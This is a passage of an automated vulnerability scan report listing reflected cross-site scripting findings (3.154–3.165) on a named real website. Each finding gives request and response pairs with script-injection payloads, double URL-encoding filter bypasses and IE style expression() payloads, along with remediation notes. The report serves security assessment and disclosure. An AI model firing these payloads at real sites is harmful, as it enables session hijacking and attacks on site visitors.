The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=smkoxh55k01vvq55ighs2efj; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/96803"><script>alert(1)</script>dfbbf862323/?id=349540/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

3.154. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a was submitted in the REST URL parameter 2. This input was echoed as f5bf0"><script>alert(1)</script>a7aeb62331a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/reviewsf5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b4ntfe451a35d0z3actuq255; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/reviewsf5bf0"><script>alert(1)</script>a7aeb62331a/?id=349540/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.155. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 was submitted in the REST URL parameter 2. This input was echoed as 6bd2b"style="x:expression(alert(1))"f1b2d917b08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/reviews6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:36 GMT
Content-Length: 8788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sktfbrnh1dtwviaawiverx45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/reviews6bd2b"style="x:expression(alert(1))"f1b2d917b08/" rel="nofollow" target="_blank">
...[SNIP]...

3.156. http://www.smartdraw.com/product/reviews [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5812"><script>alert(1)</script>d208eaaaa24 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qrx2kj45eidrpsqxg4kwhg3p; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11278
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24" rel="nofollow" target="_blank">
...[SNIP]...

3.157. http://www.smartdraw.com/product/reviews [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b82"><script>alert(1)</script>2e1c8977753 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?id=74b82"><script>alert(1)</script>2e1c8977753 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:34 GMT
Content-Length: 11117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=av1vox3nuhp5qj55p3ucfqnm; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?id=74b82"><script>alert(1)</script>2e1c8977753&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

3.158. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadb8"><script>alert(1)</script>9e1a39efb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?dadb8"><script>alert(1)</script>9e1a39efb8f=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pvqz3e55knqwjb55fkolzlq3; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11110
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?dadb8"><script>alert(1)</script>9e1a39efb8f=1" rel="nofollow" target="_blank">
...[SNIP]...

3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 11110
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4os3yc45lngvyibnt1hyfy45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?2401f"><script>alert(1)</script>0614465aa10=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.160. http://www.smartdraw.com/product/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:44 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/productc202c"style="x:expression(alert(1))"1983cde1eb1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.161. http://www.smartdraw.com/product/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/a6214"style="x:expression(alert(1))"a8713ae88e0/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.162. http://www.smartdraw.com/product/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/9a64e"style="x:expression(alert(1))"79d9addfb9a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.163. http://www.smartdraw.com/product/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:53 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22e7026"style="x:expression(alert(1))"d34dba31b1e/" rel="nofollow" target="_blank">
...[SNIP]...

3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?146c3"style="x:expression(alert(1))"5d5d2fc8c51=1" rel="nofollow" target="_blank">
...[SNIP]...

3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
